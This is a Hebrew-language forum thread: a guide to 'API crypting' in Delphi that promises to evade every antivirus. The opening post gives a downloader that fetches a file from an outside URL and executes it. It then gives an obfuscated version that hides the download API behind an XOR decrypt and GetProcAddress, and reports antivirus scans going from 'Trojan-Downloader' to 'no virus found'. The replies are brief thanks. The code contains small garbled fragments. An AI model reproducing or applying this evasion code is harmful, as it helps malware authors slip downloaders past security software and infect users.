קהילות פורומים, הורדות, יעוץ ותמיכה


אשכולות דומים

  1. [מדריך] איך פותחים קבוצה? (כולל תמונות והסברים).
    על ידי ~Black~ בפורום רשתות חברתיות
    תגובות: 1
    הודעה אחרונה: 26-01-2011, 21:24
  2. מדריך| לבנות שרת פרטי כולל תמונות
    על ידי ~!@מיכאל@!~ בפורום Maple Story
    תגובות: 13
    הודעה אחרונה: 01-05-2008, 14:30
  3. תגובות: 2
    הודעה אחרונה: 13-03-2008, 18:41
  4. [מדריך] פירמוט Vista + XP![כולל הכול]
    על ידי shlomi7570 בפורום ארכיון מדריכים
    תגובות: 65
    הודעה אחרונה: 10-08-2007, 06:44
  5. [מדריך] להוריד מRapidshare,MegaUpload(כולל תמונות)
    על ידי Desire בפורום ארכיון מדריכים
    תגובות: 7
    הודעה אחרונה: 10-03-2007, 23:07
+ תגובה לנושא
מציג תוצאות 1 עד 3 מתוך 3

מדריך| API crypting מאמר כולל.

  1. #1
    משתמש מתקדם
    שם פרטי
    חסוי
    תאריך הצטרפות
    10/2010
    הודעות
    885
    לייקים
    22
    נקודות
    -59
    משפט מחץ
    ):
    מין: זכר

    ברירת מחדל מדריך| API crypting מאמר כולל.

    היי אטררף..
    מדריך זה נכתב לשפה Delphi , אך בעזרת טיפת יצירתיות תוכלו לגלות איך להשתמש בו במספר נרחב של שפוץ

    זוהי השיטה ה 3 והמסכמת אשר תוריד כל אנטיוירוס לרגלכם , תוכלו להתגבר על כל תוכנות ספייוור כל אנטיוירוס כל צייד טרואיינים פשוט הכל תוך זמן קצר , השיטה המנפלאה הזו עובדת ב 100% עם תוצאות מוכחות !

    כיום המון אנטיוירוסים (כולם חחח =] ) מבוססים על בסיס שנקרא בסיס אוריסטי. (עזר גילוי)
    הבסיס האוריסטי הוא מנוע ענק הכולל בתוכו חותמות ובסיסים מוצפנים ב Hexdecimal , Xor Crypt .
    חותמת היא רצף של פעולות אשר נראות חשודות.

    כיצד האנטיוירוסים מגלים את הקובץ שלנו על ידי השיטה האוריסטית?

    כידוע לנו API היא מעין פקודה קבועה של השפה והיא מתפרשת כ המון פקודות אשר לוכדו על מנת ליצור קלילות.

    למשל : ה API המריץ shellexecute כולל בתוכו מגוון של משתנים אשר לא נראים לעיין על ידי המקמפל מכיוון שהשפה כבר עושה הכל עבורנו כדי לחסוך זמן תיכנות , אך אם ניכנס לניבכי הפונקציה נוכל לראות רצף מרשים של הגדרות :

    פקודה במצב פגיעה לסאן אוריסטי :

    ShellExecute

    פקודה מוגנת מסקאן הוריסטי :

    TMyProc = function(Caller: I******nown; URL: PChar; FileName: PChar; Reserved: DWORD;LPBINDSTATUSCALLBACK: pointer): HResult; stdcall;

    את הפקודה פירקנו למריכיבים שלה , אשר קובעים שם קובץ קריאה וכד'.

    כאשר תכתבו פקודה אחר האנטיוירוס האוריסטי לא יגלה את הקובץ אבל כאשר הוא יזהה מניע סדוני כמו קריאה לפנוקצייה של הורדה (UrlDownloadToFile)

    הוא מריח משהו חשוד והוא מטביע עליו חותמת , לכן את הרצף של הפעולות הוא יזהה כבעלי מניע סדוני.

    הבא נכתוב קוד פגיע לדוגמא :
    קוד:
    program Project2;

    {$APPTYPE CONSOLE}

    uses
    URLMon,windows,
    ShellApi,
    SysUtils;

    begin
    UrlDownloadToFile(nil, PChar('http://fahde..fr/bug/rel/ICrypt%201.0.rar'), PChar('C:\ICrypt.rar'), 0, nil) ;
    ShellExecute(0,'open',PChar('C:\ICrypt.rar'),nil,n il,SW_SHOW);

    end.
    האנטיוירוס האוריסטי מזהה רצף חשוד של פעילויות

    UrlDownloadToFile(nil, PChar('http://fahde..fr/bug/rel/ICrypt%201.0.rar'), PChar('C:\ICrypt.rar'), 0, nil) ;
    ShellExecute(0,'open',PChar('C:\ICrypt.rar'),nil,n il,SW_SHOW);

    הוא מזהה שהתוכנה שלנו מורידה קובץ למחשב ומפעילה אותו.
    הוא מייד יזהה שהקובץ נגוע ב Downloader.

    כעת נפשט כל פונקצייה

    כדי להסתיר את ה downloader הקטן שלנו מאנטיוירוסים אנחנו נפשט כל פונקצייה וניצור קרייפטולוגיה משלנו.
    אשר יפריד כל ביט בתוכנה ויהפוך אותו למפושט ומוסתר.

    אחרי הקרייפטולוגיה :
    קוד:
    program Project2;

    {$APPTYPE CONSOLE}
    //writte by ohad21 (Exploit)
    uses
    windows,messages,dialogs,
    ShellApi,
    SysUtils;

    type
    TMyProc = function(Caller: I******nown; URL: PChar; FileName: PChar; Reserved: DWORD;LPBINDSTATUSCALLBACK: pointer): HResult; stdcall;
    function Decrypt(Str : String; Key: string): String;
    var
    Y, Z : Integer;//writte by ohad21 (Exploit)
    B : Byte;
    begin
    Z := 1;
    for Y := 1 to Length(Str) do
    begin
    B := (ord(Str[Y]) and $0f) xor (ord(Key[Z]) and $0f);
    B := b xor 10 ;
    Str[Y] := char((ord(Str[Y]) and $f0) + B);
    Inc(Z);
    If Z > length(Key) then Z := 1;//writte by ohad21 (Exploit)
    end;
    Result := Str;
    end;



    var
    Handle: THandle;//writte by ohad21 (Exploit)
    Maproc: TMyProc;
    crypte,decrypte : string;
    begin
    Decrypte := Decrypt(']ZDLgfdgil\gNadmI' ,'2');
    showmessage(Decrypte);//writte by ohad21 (Exploit)
    Handle := loadlibrary('Urlmon.dll');

    if Handle <> 0 then

    begin

    try


    @Maproc := GetProcAddress(Handle, pchar(Decrypt(']ZDLgfdgil\gNadmI' ,'2')));

    if @Maproc<> nil then

    begin
    Maproc(nil,'http://fahde..fr/bug/rel/ICrypt%201.0.rar','C:\ICrypt.rar',0, nil);//writte by ohad21 (Exploit)
    ShellExecute(Handle,'open',PChar('C:\ICrypt.rar'), nil,nil,SW_SHOW);
    end;



    Library(Handle);
    end;
    end

    end.
    עת הבא נצפה בתוצאות :

    לפני הצפנת API :

    Ikarus: Trojan-Downloader.Win32.Banload.BQ
    Bit defender: BehavesLike:Trojan.Downloader
    NOD32: NewHeur_PE probably ******nown virus

    אחרי הצפנת API :

    Ikarus: No virus found in memory
    Bit defender: No virus found in memory
    NOD32 : No virus found in memory
    קרדיט לאתר אחר

    נ.ב.פירסמתי נושא מקודם על הנושא הזה , אז חשבתי לפרסם אותו שבילכם ,

    מנהל אבטחת מידע לשעבר.

  2. קישורים ממומנים

  3. #2
    משתמש כבוד האוואטר של ArieI
    תאריך הצטרפות
    05/2009
    גיל
    30
    הודעות
    5,151
    לייקים
    463
    נקודות
    934
    מין: זכר

    ברירת מחדל

    תודה


  4. #3
    משתמש מתחיל
    שם פרטי
    XxX
    תאריך הצטרפות
    01/2011
    הודעות
    160
    לייקים
    0
    נקודות
    50
    משפט מחץ
    pain is temporary glory is forever,never give up
    מין: זכר

    ברירת מחדל

    תודה ,
    מוכר חלקית , בהחלט חידשת לי .
    נושא חשוב מאוד לכל המתעניניים בעיליות .
    \ ´¯\).........(/¯`/
    \....\\............//..../
    \....\\Ne0//..../
    \´¯\....\´¯/...........\¯`/..../¯`/
    \.\...\....\....\.|_......_|./..../..../..././
    (.(....(....(....\.)..)..(..(./...)....)....).)
    /.............../\...\..../.../\...............\
    /.................\......../.................\


+ תגובה לנושא


הרשאות פרסום

  • אין באפשרותך לפרסם נושאים חדשים
  • אין באפשרותך לפרסם תגובות
  • אין באפשרותך לצרף קבצים
  • אין באפשרותך לערוך את הודעותיך


כל הזמנים הם לפי GMT +3. השעה כרגע היא 23:08.
מופעל על ידי vBulletin™ © גרסה 4.1, 2011 vBulletin Solutions, Inc. כל הזכויות שמורות.
פעילות הגולשים
אומנות וגרפיקה
מוזיקה
ספורט
סדרות טלוויזיה
סרטים וקולנוע
קנייה ומכירה
רשתות חברתיות
הבורר 3
פורומי פנאי ובידור
סרטים
סדרות
משחקים
דיבורים
אקטואליה
בעלי חיים
בדיחות והומור
משחקי ספורט
הבורר
מחשבים וטכנולוגיה
תמיכה טכנית
חומרה ומודינג
תוכנות להורדה
סלולארי וגאדג'טים
רקעים למחשב
ציוד הקפי למחשב
אבטחת מידע
תכנות ובניית אתרים
כסף ברשת
אייפון
בריאות ואורח חיים
כושר ופיתוח גוף
דיאטה
צבא וגיוס
יעוץ מיני
מה שבלב
אומנות הפיתוי
יהדות
מיסטיקה ורוחניות
אתאיזם ודתות

נושאים: 2,512,592 | הודעות: 8,213,185 | משתמשים: 315,603 | המשתמש החדש ביותר: upizijoj | עיצוב גרפי: סטודיו עודד בביוף | קידוד: rellect